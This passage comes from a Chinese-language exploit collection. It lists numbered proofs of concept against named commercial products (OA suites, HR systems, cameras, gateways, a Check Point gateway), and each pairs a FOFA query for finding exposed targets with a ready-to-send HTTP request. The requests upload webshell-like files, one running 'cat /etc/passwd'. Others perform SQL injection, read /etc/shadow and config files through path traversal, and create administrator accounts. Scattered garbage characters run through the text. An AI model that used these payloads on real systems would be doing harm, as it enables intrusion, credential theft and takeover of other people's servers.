3 R+ V1 e. Z3 J/ v! F<fileName>../../../../dizxdell.aspx</fileName>+ a' t! M3 \9 d
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>! h0 { z. r" {% w& _
<tag>3</tag>" {2 P" D$ t, V$ s& |( l
</UploadResume>
. S) }. Z$ H8 X& D</soap:Body>' e# _) f1 T9 X0 }" u; u
</soap:Envelope>4 q3 ^+ U0 I" X4 d& W' C4 G
) k6 k6 a9 S! [1 `- v7 r) t
5 a) k) b6 X( V
http://x.x.x.x/dizxdell.aspx6 c# t' a- m) c# O0 q& F
& S ]2 B: f1 J7 G162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
( ?. d6 p; Z7 n! WFOFA: app="和丰山海-数字标牌"
; {3 v+ b6 H$ E5 J" QPOST /QH.aspx HTTP/1.1
$ `+ ^1 G% b- ]& eHost: x.x.x.x( @2 N2 a; K( z8 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
" C% j9 L1 S6 H" j+ e) w wConnection: close
) w, W, s7 ]: f( zContent-Length: 583
5 a# B( y$ y0 M, FContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey5 A# k9 z3 L8 k3 ]! S, \; S+ w0 r
Accept-Encoding: gzip+ d* @9 M$ @- v6 g3 k
" z1 t# S6 U7 q1 d* X) j------WebKitFormBoundaryeegvclmyurlotuey
5 M2 z( v6 l' Q! @' OContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
a% q- a# G; O' U8 R+ P, YContent-Type: application/octet-stream* E, N, S- v& A2 m: x
' K, D8 [+ x- ?<% response.write("ujidwqfuuqjalgkvrpqy") %>! a( I8 \! ] _: m
------WebKitFormBoundaryeegvclmyurlotuey% w$ k" `1 M. n
Content-Disposition: form-data; name="action"
0 ~, b. D, Q4 `* Q
' _. t+ t; a! i& S! G. ~upload% c) E6 \( ~0 X O7 {" H% b6 A; {
------WebKitFormBoundaryeegvclmyurlotuey
; i% J# ?$ n* |Content-Disposition: form-data; name="responderId"
" [4 m% E( |# J2 {4 q8 e
- j; S5 D+ z, ~ a; h' ` cResourceNewResponder
/ i ^! i5 c9 A$ V0 O------WebKitFormBoundaryeegvclmyurlotuey
! d; {% w* B5 y+ pContent-Disposition: form-data; name="remotePath"8 T* P+ |, p- i0 r0 a
8 j+ G4 J+ ]- }/opt/resources& p2 I* L8 e4 j/ H7 ]( i B4 N
------WebKitFormBoundaryeegvclmyurlotuey--! N: m F0 F0 a% {: X0 i, r
5 Q$ v6 M% u) a g( h- p% V- I3 i
, w& N$ u6 P2 U6 D, m% vhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx( b5 T; \! K2 \) r
) r" N6 W! F! d; c3 c# f163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
' W% H M& Z" t2 ^" a- P% ?FOFA: icon_hash="-795291075"* w* T6 M8 _$ P: }8 t5 ^
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1& N; Q' u4 c( T( g! Q
Host: x.x.x.x2 Z3 h) R3 T- D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
0 ~1 C: T4 ~. H, _% X) [: \0 ]0 QConnection: close( _ q& D" S' K3 k( X4 y `
Content-Length: 293
- b/ @, D! L- qAccept: */*
- z, p O: R* ~2 g* e& q* NAccept-Encoding: gzip, deflate2 Y) j" u9 X% h, J" q
Accept-Language: zh-CN,zh;q=0.9
& ]" L0 C6 Q, zContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod9 ^& }% P/ d1 I
4 a/ m0 f- X2 m; G------iiqvnofupvhdyrcoqyuujyetjvqgocod" A% H- r" v) w" R8 f
Content-Disposition: form-data; name="name"
, y' I& C N% b3 n- k, _# C8 P9 u2 Q: w6 Y7 s4 z/ {6 ^) V
1.php/ @; S' U+ R6 n( S- t+ ^6 R
------iiqvnofupvhdyrcoqyuujyetjvqgocod; R5 ]' S' d! g9 q p) G* s
Content-Disposition: form-data; name="upfile"; filename="1.php"
* S7 Z% y* W/ K1 U$ B6 d: M2 KContent-Type: image/jpeg
1 N; |& }' X6 Y0 R" d1 J) M$ ~9 a7 n+ m0 X* D: @- k. w. {: g3 i
rvjhvbhwwuooyiioxega( \$ `6 v, r/ m
------iiqvnofupvhdyrcoqyuujyetjvqgocod--* w3 l) h! |5 H" K
( o6 Q/ M+ b* `! v; U
# ?/ w8 E- f5 U/ \- l/ F3 J164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
' s! @0 @: V# _% K+ L9 z) q/ rFOFA: title="智慧综合管理平台登入"
$ T8 f( c/ u' q9 ?POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1( E1 D; j) _- m6 f; h8 U3 }
Host: x.x.x.x4 @9 r1 P6 V& b8 F: D5 U4 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.05 @; h$ e$ C1 `7 u& N
Content-Length: 288- l9 h3 {; z5 ~* I( R: C7 Z0 J
Accept: application/json, text/javascript, */*; q=0.01# W) a) Z& a% D3 _( z9 ?/ L' ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
+ x- Y9 B+ h7 u. M1 V" KConnection: close
7 z8 I3 u# n& N; W; IContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
* n4 e0 T' k" P" e' TX-Requested-With: XMLHttpRequest
/ O( Y, L! O: J1 {& F- aAccept-Encoding: gzip
4 M0 w, y- K3 L; N+ X5 N' [! M* Z2 L3 r4 M
------dqdaieopnozbkapjacdbdthlvtlyl# j2 y% O8 ]8 T+ t
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
" u, J) q+ J0 d# EContent-Type: image/jpeg6 ^! e! X( S* j! Q3 K3 v* B
; O/ h0 F6 T- s3 o<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>0 C- E" n: X: z# e1 j8 [
------dqdaieopnozbkapjacdbdthlvtlyl--; A% q* @. z* p" L( ~9 f
4 v9 x# \' V9 u& j: G
! x4 s4 ^% e9 k8 ^* C! Xhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
; c% F( {. F/ O+ I% P
1 b ]+ x. x; q5 |. R# _165. OrangeHRM 3.3.3 SQL 注入7 Y: d, j; H; s6 {" v& ~# s
CVE-2024-36428
, h6 m1 X/ o* O0 [/ M+ SFOFA: app="OrangeHRM-产品"3 s g: `8 k8 V E2 \4 [
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))$ V. N0 v: c- k T
& j5 {7 e2 e: m; k2 D& J% R* l
3 |- f7 O+ i( p& K+ d: x# d: C
166. 中成科信票务管理平台SeatMapHandler SQL注入& x6 n! e) z7 W5 h% O
FOFA:body="技术支持:北京中成科信科技发展有限公司"( K" o. Y! F: v3 Z% o
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
7 j1 D3 t/ g5 {! i8 iHost:7 T0 n7 v- `9 e4 J" A; L
Pragma: no-cache, s4 B% B: \) j3 Y6 J+ H& Y9 M$ S
Cache-Control: no-cache u5 p: j6 {' p/ ]' a
Upgrade-Insecure-Requests: 1) j5 }7 N5 E+ k0 _3 L$ A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36. M _3 b: z8 W8 X' @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 J- r6 T- \! S$ C+ K3 s* u7 RAccept-Encoding: gzip, deflate' C: C R4 C* }' h% f% ^
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
3 x/ }2 E+ S. |8 p NCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE% [; l5 v& A2 G% z( [
Connection: close
! o; F' l$ x* _( P$ FContent-Type: application/x-www-form-urlencoded
$ \9 y; W' [7 p8 d8 D8 K( GContent-Length: 89
9 Z2 q1 A, V( g+ q3 E/ Y. I- l; i" ^% C* {
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE" m$ l; p6 N5 w2 [9 l' V! t+ v
, O/ W j7 V. R3 d' P/ V) z
' ^3 w! D8 G; x7 i
167. 精益价值管理系统 DownLoad.aspx任意文件读取! U8 }$ ` n" Q4 A9 T6 |
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"2 n2 r3 v3 k8 q: ]- b0 B
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
' c3 v: Q2 j& {/ G kHost:
! [4 C) H9 H2 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 W' u$ G! [+ y$ {+ d7 M7 ]Content-Type: application/x-www-form-urlencoded' X- R4 d6 J4 t
Accept-Encoding: gzip, deflate
7 u& w' J1 A% \" vAccept: */*# P/ L/ V/ w5 R% q
Connection: keep-alive) V- }$ \1 g% A& H
0 }! L: K- J: J
$ O' Y* X7 D/ J# n: n& r" _
168. 宏景EHR OutputCode 任意文件读取
9 `% G9 t7 A) u7 Z* [4 a oFOFA:app="HJSOFT-HCM"
% |4 B) ~7 S1 x4 W# j. cGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
$ R# ~0 T' w# ?2 _# _% {8 dHost: your-ip
# o8 ~% O& x4 F! ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.366 P: X8 g* H% R+ p
Content-Type: application/x-www-form-urlencoded {% O$ y" T" A
Connection: close
6 J5 P! t) v2 N& [/ q) Y% v4 Z' C0 U$ G5 ~+ S: c
. r% d E/ {/ Q8 j1 E: O
9 ]& Z; J2 \: {" S* Z
169. 宏景EHR downlawbase SQL注入 J0 v0 T6 L7 k& T1 L: B
FOFA:app="HJSOFT-HCM"( V- P5 a9 f( o3 O" ~+ P$ r3 W; p
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
/ y6 `" I; p9 E7 I8 {: R' ] qHost: your-ip7 k0 l# `2 {: A$ d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: \6 ]; \* A \, n" L# M j3 XAccept: */*! g8 Z8 I! I* M9 ]: f
Accept-Encoding: gzip, deflate# ~+ G p }3 |) R4 F
Connection: close4 i& ]# k% q. ~& H+ @
( |' X* W* J" ]' c, q% i+ `
1 p- o! K0 v# R& g5 R
4 l7 q% Z0 n, e
170. 宏景EHR DisplayExcelCustomReport 任意文件读取7 j" l9 I7 @& Q8 B
FOFA:body="/general/sys/hjaxmanage.js" v$ d8 h; W' I, C0 B
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1+ `: C. F4 R. s* d { W
Host: balalanengliang0 Z9 X+ b! e, f! f
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! k* n1 b; p' `- ~! Y! a4 T5 X6 GContent-Type: application/x-www-form-urlencoded
2 y, f. B( f$ f( W/ C8 D8 S& i
filename=../webapps/ROOT/WEB-INF/web.xml
' |9 V/ h4 _: F r" L8 S* S$ k- u; O
( e1 B+ D, ^4 A7 |. Q7 c# Q: F# F b* W- O+ b/ {% i
171. 通天星CMSV6车载定位监控平台 SQL注入; Y% |/ I& {# A2 p, [+ b6 J
FOFA:body="/808gps/", ]5 c; q2 Z. k9 q# s, u. }
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
* H# h2 `+ s4 rHost: your-ip
2 }7 {( U, Q& j' K0 AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
/ ^4 ^2 _2 m6 v' B* [Accept: */*
; x+ W) @3 R6 g& kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 j1 V ?9 G% N# d6 ?
Accept-Encoding: gzip, deflate: r! c7 F/ ~3 k& `
Connection: close, K2 I' n& ? T
! d1 B }3 o7 Z+ c
3 d. p# p/ x! F) C6 l8 F
) J' l4 Z/ J& Z* K' x) c
172. DT-高清车牌识别摄像机任意文件读取2 O3 S' x7 p! U/ A
FOFA:app="DT-高清车牌识别摄像机"
& z. P: e# l4 _6 m7 {GET /../../../../etc/passwd HTTP/1.1
5 H+ F0 I& X) c, M1 d- J) mHost: your-ip
2 \$ l# o' r+ Q+ S3 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 @9 Q4 c; h; Q! C; L2 g! E
Accept-Encoding: gzip, deflate; }- i& [5 M8 F" t0 }
Accept: */*
8 L' L( \0 ^( h) |- qConnection: keep-alive q- R- P& Q y; ^
: T- s, e2 e; I
# ?4 {. w/ ~/ q9 D# V
6 H1 {9 k Q* E/ I* F U. u173. Check Point 安全网关任意文件读取
5 K( Z, {/ v; J' y# b6 w6 ]CVE-2024-24919
. K+ i3 C: V3 T- t; w( eFOFA:app="Check_Point-SSL-Network-Extender"% H3 t- b) h) N. R
POST /clients/MyCRL HTTP/1.1
& X8 N* p$ S3 v ?Host: your-ip
7 u* A, ^/ G& PContent-Type: application/x-www-form-urlencoded
5 }" E4 N$ ?4 {% m5 `0 S# Z) C4 E; U( K6 \; q; y
aCSHELL/../../../../../../../etc/shadow! D$ X1 {$ T. o, U d9 y/ _( [
! i- e6 Z+ _. w2 g7 ?; A# ^' {$ {7 H6 [& R2 a; o7 L# g1 m0 ?
$ T: x) J7 t0 c' u- D174. 金和OA C6 FileDownLoad.aspx 任意文件读取% k$ _$ `+ c! Z# A, {0 M5 ]
FOFA:app="金和网络-金和OA"
; \: w' R% W% }GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.17 u# Y+ _- Y$ x5 }6 G0 K6 I* d
Host: your-ip4 Y7 ~7 T6 i- k) X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
! x4 ~0 F, X5 [0 Q, C% u, sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 T4 N6 L# D# e% s, K+ zAccept-Encoding: gzip, deflate, br' r; i5 @* f4 N; f( p% \
Accept-Language: zh-CN,zh;q=0.94 R/ D8 ]& Y. I, z, k
Connection: close- j; l8 e" s/ e9 i4 R" {# S& R4 `
7 e" E* O, p: a G
9 N) M& U; K6 U
& f C+ N; W$ c) a! Y
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入& m( S- F" z+ c: _8 z
FOFA:app="金和网络-金和OA"
" L+ n: l- }1 Y- PGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.17 Q( g6 N1 E! U; W; E
Host:! q" B+ ?' Z) }* b8 k4 d: b# b
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
1 p% ?5 r0 [4 I; @* zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 G7 ~6 B2 i. u. U+ lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& ` D$ Z( S& R
Accept-Encoding: gzip, deflate
" w3 \, N3 }+ }$ ^* F. R7 m- Q3 v pConnection: close. y/ ?4 _: ~- q- {
Upgrade-Insecure-Requests: 1
7 O) a- ]3 k1 _+ d: h! p3 T1 X7 u9 D. n7 G8 K$ a7 z% q5 ~4 ]4 R1 y" l
7 r% T: @7 q& B0 u. a176. 电信网关配置管理系统 rewrite.php 文件上传5 |6 S* r: K: R1 X
FOFA:body="img/login_bg3.png" && body="系统登录"/ |7 E+ ~( ?* D: V
POST /manager/teletext/material/rewrite.php HTTP/1.1
! y/ i+ a3 g% }- T" D: bHost: your-ip
; ~/ M+ e9 S8 v; T+ pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
. z D6 w. A1 ^) L% V' i4 YContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
+ S: L& N5 K7 bConnection: close8 K+ t$ K2 U( i) ]
; i6 J" j" z2 v7 D- k------WebKitFormBoundaryOKldnDPT
( P4 G6 o- c, m o' T! jContent-Disposition: form-data; name="tmp_name"; filename="test.php"; v' I9 y5 h: N
Content-Type: image/png
3 b- T1 ]4 y3 A* L+ Q6 Q4 q + n7 q1 e( h6 w% r
<?php system("cat /etc/passwd");unlink(__FILE__);?>
: `4 ~2 {; I' w8 n------WebKitFormBoundaryOKldnDPT
& o& e$ c) `1 E5 J6 ]Content-Disposition: form-data; name="uploadtime"
9 {; n" ?7 k F% j u$ E* Z2 A# Q
2 Z( a3 @! _4 Q( V2 H# C$ p7 r - t1 h: d g0 S2 e9 [# B% \# M
------WebKitFormBoundaryOKldnDPT--6 u( Z9 Y+ `0 d9 K" d1 t% x
% N* X6 r: m/ w
+ w F/ c. v/ F1 e& D* N
4 P0 I: o* B5 k( W& w8 z) z* [177. H3C路由器敏感信息泄露
" | Q& Q/ n" ]: \- ?# s6 S/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg# A* v y m3 ]4 A1 J% R- k
/userLogin.asp/../actionpolicy_status/../M60.cfg
0 y: D, _) x* I0 w7 H. \) p/userLogin.asp/../actionpolicy_status/../GR8300.cfg
1 U7 Y; @2 y( z9 q( q8 H/userLogin.asp/../actionpolicy_status/../GR5200.cfg
2 h. O' n& A" U) A1 k+ M# T2 a: k/userLogin.asp/../actionpolicy_status/../GR3200.cfg
, H$ _8 [* _# e8 v/userLogin.asp/../actionpolicy_status/../GR2200.cfg
N; S! O+ }& e( M/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg. k/ w2 b6 _* ], v3 Y
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg& ?/ Q+ m5 p' M. J6 j5 z
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg& _: Q$ D& h/ J7 b) ^5 A
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
, i( n* g m3 [6 S. \/userLogin.asp/../actionpolicy_status/../ER5200.cfg8 F$ a: p4 X" K
/userLogin.asp/../actionpolicy_status/../ER5100.cfg# n9 O* K: F0 U$ n0 y' X
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg5 ^! k8 i& s0 o# g
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
& X2 z; _) h. K6 u, O I+ E/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg4 w# O' q% k9 o" n( q7 k
/userLogin.asp/../actionpolicy_status/../ER3200.cfg7 j1 g T6 @. Y" U* [
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg/ |8 c$ b7 c$ f4 Q& _
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg, f/ N' D: l$ M# E9 `7 M
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
4 I; k$ ~+ d8 {# O, H9 p/userLogin.asp/../actionpolicy_status/../ER3100.cfg
9 @3 w3 B8 [- j/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
9 n; v3 _( x2 B" o" m( t l% v3 f) r' o3 u
4 y q4 V0 m& u* {178. H3C校园网自助服务系统-flexfileupload-任意文件上传
: L+ G+ l, Q9 a! [FOFA:header="/selfservice"* t1 x+ Z' C4 K3 o+ N+ c$ p
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1 K: \! i2 B- Z4 y; d8 Q
Host:% `8 W8 L7 D5 A/ F& N; L& D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36+ e, M* h$ P$ p" R$ B- M9 \& _) s5 N
Content-Length: 252
, |8 g+ a) R2 E( g1 z; l5 u hAccept-Encoding: gzip, deflate
. V r0 `/ d+ k5 D7 ?1 t/ L5 E. ~/ xConnection: close
) v& m' c# s/ N) ?. c$ jContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l) {) M5 a* _, }, h: n
-----------------aqutkea7vvanpqy3rh2l" z) l( @ H7 O6 P/ z, j
Content-Disposition: form-data; name="12234.txt"; filename="12234"1 h; Y$ ^7 o. _; K% H
Content-Type: application/octet-stream
( X# G& S4 o6 `+ r iContent-Length: 255
H3 q% x7 ~2 k, ~: `& ~% i1 k; m: a# O. _+ Q
12234* \ c7 n/ M% F/ `
-----------------aqutkea7vvanpqy3rh2l--* w# B4 ]3 ^5 e
$ A. e1 P# ^5 y+ Z
+ Q. N3 l+ E& A& d+ X' VGET /imc/primepush/%2e%2e/flex/12234.txt
: m: Y5 Z- C/ @- D
0 M. [; L) s' e( p7 [2 `: T4 D4 Q' @ ~' e2 e2 L6 i7 W, U5 g9 V( @. ^
179. 建文工程管理系统存在任意文件读取0 b( v+ Z5 h" p7 B( V
POST /Common/DownLoad2.aspx HTTP/1.1
$ X* t. [* X, t9 Q! h7 \Host: {{Hostname}}
+ `- e* F4 U7 G' i9 yContent-Type: application/x-www-form-urlencoded; O9 A6 @: [+ ^0 s+ o4 r0 [
User-Agent: Mozilla/5.0; z' C' n4 F/ x; s; _" {
& Y4 J9 o5 r' ~0 n, J6 lpath=../log4net.config&Name=
; r. m5 l5 {+ D0 X
. C: k0 \0 z/ h& [* z5 W' g# K! l) n" z m! c5 f7 w: q2 P% ~
180. 帮管客 CRM jiliyu SQL注入
7 y& _7 Q: m5 e. B0 g$ A; P- yFOFA:app="帮管客-CRM"
5 W, @4 o" S+ o2 b9 xGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1% ?' H0 K9 p3 r( W- u. U
Host: your-ip
! U$ ^* h0 L/ R5 U$ cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36$ A0 G% ~. J7 F0 K3 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 z' y5 e# d! J& A8 }8 {
Accept-Encoding: gzip, deflate
5 O6 V) W+ ]$ R. i+ }% pAccept-Language: zh-CN,zh;q=0.9
9 d1 t7 i, P$ F! Q$ S2 ~Connection: close0 I, W. w D; u
% E0 i+ e* k# A1 z; c, C
2 |" i3 Z4 I, u2 t5 I/ n) F9 M% N181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
6 D* w. }% e% ]# ~8 fFOFA:"PDCA/js/_publicCom.js"
" I/ D8 D8 L; ]# O# bPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
& _$ k$ _% ?, U. `+ |, _8 kHost: your-ip& c! W5 k9 @8 u M9 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.364 ?4 f$ P F) g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 e; p0 a$ c6 h
Accept-Encoding: gzip, deflate, br3 A5 V0 f& ]5 T/ M+ m$ v. H9 _
Accept-Language: zh-CN,zh;q=0.9
3 R0 @/ Q" J. ~* ~/ Y% B8 S8 BConnection: close
I2 p! @3 C6 B, f7 h2 TContent-Type: application/x-www-form-urlencoded
" S( c' E0 Z! ^' Y) f# I! O2 i2 t" s5 L. [" l4 E" ~+ E0 H
. _7 q4 e5 Z$ Paction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20* M2 M. Z1 x: Z" W* R6 [5 V3 G
- T/ f; d3 _! g8 R# @+ N
' A( |/ [' j+ {7 @182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
c8 E: l( {2 X( S% c9 t" EFOFA:"PDCA/js/_publicCom.js"6 N5 H* H: }) h. K
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
, o) t) l( e' v |5 g% [* \Host: your-ip
' e# u: ~( N2 w. wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36$ n/ l; G. ]3 o! [% N9 X" b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. U7 G' ~6 F: i7 pAccept-Encoding: gzip, deflate, br
- Q( l9 T$ K2 S$ rAccept-Language: zh-CN,zh;q=0.9
: @( q K. D( L: p) hConnection: close; H/ O5 x: y& }' R0 ?7 b
Content-Type: application/x-www-form-urlencoded/ i% j7 ?6 f0 m- J' F5 }
# C, W( A/ {) t: o2 g1 X
- u7 H- x: n8 _5 v( v% Jusername=test1234&pwd=test1234&savedays=1
) H `- V& |" \8 y. x8 k
9 o3 n. p; ]/ G2 j; S
" [' Z( P9 b r! X3 s5 @183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
9 f! m$ W% i- r! L) d1 mFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
6 O1 d) w- }) q) e' {2 p& x+ ^GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
) z' U Z% C- _ v/ I$ Q" |Host: your-ip4 D! C7 i: p+ d2 c d
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36: c6 X0 S2 l: N: _% n/ f
Accept-Charset: utf-83 [- H3 j$ Q8 s! k4 C% N
Accept-Encoding: gzip, deflate
1 ?4 T! x# C! R+ K' \$ R6 CConnection: close! x a6 ~$ H0 R- m8 @" S
% g2 j% O3 N z' p
% p1 _8 O( H6 I- q
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加# s6 m$ Z) i3 V9 D+ X
FOFA:server="SunFull-Webs"" m9 c% a5 H1 J- a% z! @6 ~# w$ P
POST /soap/AddUser HTTP/1.1
: k' k- H3 w" q9 k7 aHost: your-ip
/ \7 W% `* O; j# VAccept-Encoding: gzip, deflate
4 l! t8 u' R) V+ j7 P& ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.00 k. g- ^1 ]5 m/ ]3 C! G# m7 p
Accept: application/xml, text/xml, */*; q=0.01
( b& a3 F. }7 j# g* pContent-Type: text/xml; charset=utf-8
# h; W# O3 Z+ L% D# L+ j1 |* Q' L1 Q) bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- \* O. M7 c( @$ o, {" ~X-Requested-With: XMLHttpRequest
4 s- {7 L3 u7 ?2 @* B+ B0 ?4 H+ K$ e( z* n& W
( S" M& X0 ~8 }0 z! j
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
9 x# T- {8 N. f1 g) c3 C6 ^7 F" `" n
8 ]3 ~* h, J2 y( A. j0 x0 J185. 瑞友天翼应用虚拟化系统SQL注入1 Z& U4 |: h: x L0 i I A
version < 7.0.5.1
9 u/ _& O* \ AFOFA:app="REALOR-天翼应用虚拟化系统"
" H0 v4 k6 d& E0 I& a0 QGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
% [2 ~# G4 p/ n ^4 rHost: host) q$ |; \1 ^5 ?5 l: w) w3 A1 g c
